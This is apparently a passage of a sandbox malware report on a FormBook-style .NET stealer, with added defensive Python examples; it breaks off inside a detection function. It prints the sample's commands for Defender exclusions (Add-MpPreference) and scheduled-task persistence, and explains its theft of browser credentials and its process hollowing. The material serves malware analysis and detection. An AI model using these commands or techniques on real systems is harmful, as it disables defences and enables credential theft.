                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00EF2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF35C0 NtCreateMutant,LdrInitializeThunk,7_2_00EF35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF4340 NtSetContextThread,7_2_00EF4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF4650 NtSuspendThread,7_2_00EF4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2AF0 NtWriteFile,7_2_00EF2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2AD0 NtReadFile,7_2_00EF2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2AB0 NtWaitForSingleObject,7_2_00EF2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2BE0 NtQueryValueKey,7_2_00EF2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2BF0 NtAllocateVirtualMemory,7_2_00EF2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2BA0 NtEnumerateValueKey,7_2_00EF2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2B80 NtQueryInformationFile,7_2_00EF2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2CF0 NtOpenProcess,7_2_00EF2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2CC0 NtQueryVirtualMemory,7_2_00EF2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2CA0 NtQueryInformationToken,7_2_00EF2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2C60 NtCreateKey,7_2_00EF2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2C00 NtQueryInformationProcess,7_2_00EF2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2DD0 NtDelayExecution,7_2_00EF2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2DB0 NtEnumerateKey,7_2_00EF2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2D30 NtUnmapViewOfSection,7_2_00EF2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2D00 NtSetInformationFile,7_2_00EF2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2D10 NtMapViewOfSection,7_2_00EF2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2EE0 NtQueueApcThread,7_2_00EF2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2EA0 NtAdjustPrivilegesToken,7_2_00EF2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2E80 NtReadVirtualMemory,7_2_00EF2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2E30 NtWriteVirtualMemory,7_2_00EF2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2FE0 NtCreateFile,7_2_00EF2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2FA0 NtQuerySection,7_2_00EF2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2FB0 NtResumeThread,7_2_00EF2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2F90 NtProtectVirtualMemory,7_2_00EF2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2F60 NtCreateProcessEx,7_2_00EF2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2F30 NtCreateSection,7_2_00EF2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3090 NtSetValueKey,7_2_00EF3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3010 NtOpenDirectoryObject,7_2_00EF3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF39B0 NtGetContextThread,7_2_00EF39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3D70 NtOpenThread,7_2_00EF3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF3D10 NtOpenProcessToken,7_2_00EF3D10
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0190951C NtQueryInformationProcess,8_2_0190951C
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01909AE8 NtQueryInformationProcess,8_2_01909AE8
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EF5130 appears 53 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F07E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F3F290 appears 98 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EAB970 appears 210 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0135EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01337E54 appears 94 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F2EA12 appears 76 times
Source: 0t7MXNEfCg.exe | Static PE information: invalid certificate
Source: 0t7MXNEfCg.exe, 00000000.00000002.934271222.00000000049B2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs 0t7MXNEfCg.exe
Source: 0t7MXNEfCg.exe, 00000000.00000000.858523862.0000000000C72000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezGhu.exe: vs 0t7MXNEfCg.exe
Source: 0t7MXNEfCg.exe, 00000000.00000002.944758824.000000000AF70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs 0t7MXNEfCg.exe
Source: 0t7MXNEfCg.exe, 00000000.00000002.930848160.0000000003240000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs 0t7MXNEfCg.exe
Source: 0t7MXNEfCg.exe, 00000000.00000002.940130193.0000000009C80000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs 0t7MXNEfCg.exe
Source: 0t7MXNEfCg.exe, 00000000.00000002.929795834.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 0t7MXNEfCg.exe
Source: 0t7MXNEfCg.exe | Binary or memory string: OriginalFilenamezGhu.exe: vs 0t7MXNEfCg.exe
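The rows above are the sandbox comparing every OriginalFilename value it finds in the sample and its memory dumps against the name the file carries on disk; three different names (zGhu.exe, TL.dll, Montero.dll) inside one executable is the footprint of a packed loader carrying embedded payload assemblies. The following is an added example, not Joe Sandbox code, of how that check works: it locates the UTF-16LE key "OriginalFilename" inside VS_VERSIONINFO String nodes, reads the value length from the node header when one is present, and falls back to scanning to the NUL terminator for a loose copy of the string in a memory dump. The blob it runs over is constructed here to mimic those layouts; it is not the sample.

```python
import struct

# VS_VERSIONINFO String nodes are UTF-16LE: wLength, wValueLength (in WCHARs), wType, szKey, [pad], value
KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def version_string(key: str, value: str) -> bytes:
    """Pack one VS_VERSIONINFO 'String' node (used only to build the constructed test blob)."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    v = value.encode("utf-16-le") + b"\x00\x00"
    if (6 + len(k)) % 4:          # szKey is padded to a DWORD boundary before the value
        k += b"\x00\x00"
    return struct.pack("<HHH", 6 + len(k) + len(v), len(v) // 2, 1) + k + v


def original_filenames(blob: bytes) -> list[str]:
    """Every OriginalFilename value in a PE image or memory dump, in file order."""
    found, pos = [], 0
    while (pos := blob.find(KEY, pos)) >= 0:
        n_words, w_type = 0, 0
        if pos >= 6:              # header sits 6 bytes before szKey in a well-formed node
            _, n_words, w_type = struct.unpack_from("<HHH", blob, pos - 6)
        start = pos + len(KEY)    # 6 + 34 bytes is DWORD aligned, so this key never needs padding
        if w_type == 1 and 0 < n_words <= 260:
            raw = blob[start:start + n_words * 2]
        else:                     # loose string without a header: scan to the UTF-16 NUL
            end = start
            while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
                end += 2
            raw = blob[start:end]
        found.append(raw.decode("utf-16-le", "replace").rstrip("\x00"))
        pos = start
    return found


def mismatches(blob: bytes, on_disk_name: str) -> list[str]:
    """OriginalFilename values that disagree with the name the file has on disk (case-insensitive)."""
    return [n for n in original_filenames(blob) if n.lower() != on_disk_name.lower()]


# Constructed test image: two version nodes plus a header-less copy such as a memory dump would hold.
SAMPLE_BLOB = (
    b"MZ" + b"\x90" * 30
    + version_string("OriginalFilename", "zGhu.exe")
    + b"\x00" * 8
    + version_string("CompanyName", "Example")
    + b"\xCC" * 5
    + version_string("OriginalFilename", "TL.dll")
    + b"\xAB" * 3
    + KEY + "Montero.dll".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    for name in mismatches(SAMPLE_BLOB, "0t7MXNEfCg.exe"):
        print(f"OriginalFilename {name!r} vs 0t7MXNEfCg.exe")
```

Run it against a real file with `mismatches(open(path, "rb").read(), os.path.basename(path))`; a .NET loader that embeds other assemblies as resources will typically yield several names, while a clean build yields one that matches.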
Source: 0t7MXNEfCg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0t7MXNEfCg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HrovwwypYVlFWB.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.0t7MXNEfCg.exe.4cb75f0.5.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.0t7MXNEfCg.exe.4c2cdd0.3.raw.unpack, hISkYvQ5NV6mByK8fF.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.0t7MXNEfCg.exe.af70000.8.raw.unpack, n6eXSFw2UA5h51Qd8E.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@24/21@14/11
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | File created: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Mutant created: \Sessions\1\BaseNamedObjects\AcbFYPhOID
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | File created: C:\Users\user\AppData\Local\Temp\tmp476F.tmp
Source: 0t7MXNEfCg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0t7MXNEfCg.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003600000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1286750548.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3312040086.00000000035D2000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000003.1279380963.00000000035D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
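That CREATE TABLE text is not something the malware carries in its own code: SQLite stores every table's DDL verbatim in the sqlite_master catalogue, so its appearance in EhStorAuthn.exe memory means the injected FormBook stage opened a Chromium "Login Data" database and read the catalogue on the way to the logins table. The following is an added example, not part of the Joe Sandbox report, that shows the mechanism from the defender's side: it builds an in-memory database with the report's exact password_notes schema (the logins table is a reduced stand-in for Chromium's, which has many more columns), then fingerprints it the way a triage script would fingerprint a copied "Login Data" file, without decrypting anything. The row data is constructed.

```python
import sqlite3

# The exact DDL string found in EhStorAuthn.exe memory above; SQLite keeps it in sqlite_master.
PASSWORD_NOTES_DDL = (
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL "
    "REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, "
    "key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, "
    "UNIQUE (parent_id, key));"
)
# Reduced stand-in for Chromium's logins table (assumption: only the columns this example needs).
LOGINS_DDL = ("CREATE TABLE logins (id INTEGER PRIMARY KEY, origin_url VARCHAR NOT NULL, "
              "username_value VARCHAR, password_value BLOB)")
SEALED_PREFIXES = (b"v10", b"v20")   # Chromium OSCrypt tags on Windows: DPAPI-wrapped AES-GCM key


def build_sample_db(with_schema: bool = True) -> sqlite3.Connection:
    """In-memory stand-in for a copied 'Login Data' file; constructed rows, not real credentials."""
    con = sqlite3.connect(":memory:")
    if with_schema:
        con.execute(LOGINS_DDL)
        con.execute(PASSWORD_NOTES_DDL)
        con.executemany(
            "INSERT INTO logins (origin_url, username_value, password_value) VALUES (?, ?, ?)",
            [("https://mail.example/", "alice", b"v10" + bytes(range(12)) + b"\xde\xad"),
             ("https://bank.example/", "bob", b"v10" + bytes(range(12)) + b"\xbe\xef")])
        con.execute("INSERT INTO password_notes (parent_id, key, value, date_created, confidential) "
                    "VALUES (1, '', ?, 0, 0)", (b"note",))
    return con


def fingerprint_login_db(con: sqlite3.Connection) -> dict:
    """Identify a Chromium credential store from its catalogue alone and count what it holds."""
    ddl = dict(con.execute("SELECT name, sql FROM sqlite_master WHERE type = 'table'"))
    notes_ddl = ddl.get("password_notes") or ""
    is_store = "logins" in ddl and "REFERENCES logins" in notes_ddl
    count = con.execute("SELECT count(*) FROM logins").fetchone()[0] if "logins" in ddl else 0
    # Values still carry the OSCrypt tag, i.e. the stealer must also take Local State / DPAPI to use them.
    sealed = is_store and all(
        v is not None and v[:3] in SEALED_PREFIXES
        for (v,) in con.execute("SELECT password_value FROM logins"))
    return {"chromium_login_store": is_store, "tables": sorted(ddl), "logins": count, "values_sealed": sealed}


if __name__ == "__main__":
    print(fingerprint_login_db(build_sample_db()))
```

On a real triage copy, open it read-only (`sqlite3.connect("file:Login Data?mode=ro", uri=True)`) after copying the file out of the locked profile directory; the same catalogue query also distinguishes a Login Data file from Cookies or Web Data, whose DDL names different tables.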
Source: 0t7MXNEfCg.exe | Virustotal: Detection: 75%
Source: 0t7MXNEfCg.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | File read: C:\Users\user\Desktop\0t7MXNEfCg.exe
Source: unknown | Process created: C:\Users\user\Desktop\0t7MXNEfCg.exe "C:\Users\user\Desktop\0t7MXNEfCg.exe"
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\0t7MXNEfCg.exe"
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"
Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"
Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe | Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
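The process-creation rows above contain the whole FormBook execution chain in four observable steps: the .NET loader adds Defender exclusions for itself and its dropped copy through PowerShell, registers a scheduled task from an XML file in the user's Temp directory, starts an argument-less copy of the RegSvcs.exe LOLBin to hollow, and the injected stage (here living in EhStorAuthn.exe) launches Firefox to harvest credentials. The following is an added example, not part of the Joe Sandbox report, of detection logic that encodes those four behaviours as rules over process-creation records; the records are constructed from the rows above rather than taken from a live telemetry feed, and the rule names are this example's own. It is written so that conhost.exe, WmiPrvSE.exe and the svchost.exe BITS host in the same chain do not fire.

```python
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcCreate:
    parent: str   # image path of the creating process; "unknown" when the sandbox did not observe it
    child: str    # image path of the created process
    cmdline: str  # command line the child was started with


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
SAMPLE = r"C:\Users\user\Desktop\0t7MXNEfCg.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe"
LOADER = r"C:\Program Files (x86)\NdwfZQtiWxsVWwfAczQbCOWywGoNTYUCcIZPBANOeeHmlyhsFcJYMdDAoSJ\nufnwZ9IW.exe"
EHSTOR = r"C:\Windows\SysWOW64\EhStorAuthn.exe"

# Constructed from the "Process created" rows of this report, in report order; not a live log feed.
SAMPLE_EVENTS = [
    ProcCreate("unknown", SAMPLE, f'"{SAMPLE}"'),
    ProcCreate(SAMPLE, PS, f'"{PS64}" Add-MpPreference -ExclusionPath "{SAMPLE}"'),
    ProcCreate(PS, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcCreate(SAMPLE, PS, f'"{PS64}" Add-MpPreference -ExclusionPath "{DROPPED}"'),
    ProcCreate(PS, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcCreate(SAMPLE, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp476F.tmp"'),
    ProcCreate(SCHTASKS, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcCreate(SAMPLE, REGSVCS, f'"{REGSVCS}"'),
    ProcCreate("unknown", DROPPED, DROPPED),
    ProcCreate(PS, r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"),
    ProcCreate(DROPPED, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HrovwwypYVlFWB" /XML "C:\Users\user\AppData\Local\Temp\tmp69AD.tmp"'),
    ProcCreate(SCHTASKS, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcCreate(DROPPED, REGSVCS, f'"{REGSVCS}"'),
    ProcCreate(LOADER, EHSTOR, f'"{EHSTOR}"'),
    ProcCreate("unknown", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
    ProcCreate(EHSTOR, r"C:\Program Files\Mozilla Firefox\firefox.exe", r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]

WINDOWS_ROOT = "c:\\windows\\"
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _in_windows(path: str) -> bool:
    return path.lower().startswith(WINDOWS_ROOT)


def _bare_image(ev: ProcCreate) -> bool:
    """True when the command line carries nothing but the image path: typical of a hollowing target."""
    return ev.cmdline.strip().strip('"').lower() == ev.child.lower()


def triage(events) -> list[tuple[str, str]]:
    """Return (rule, child image) pairs for every record that matches one of the four behaviours."""
    hits = []
    for ev in events:
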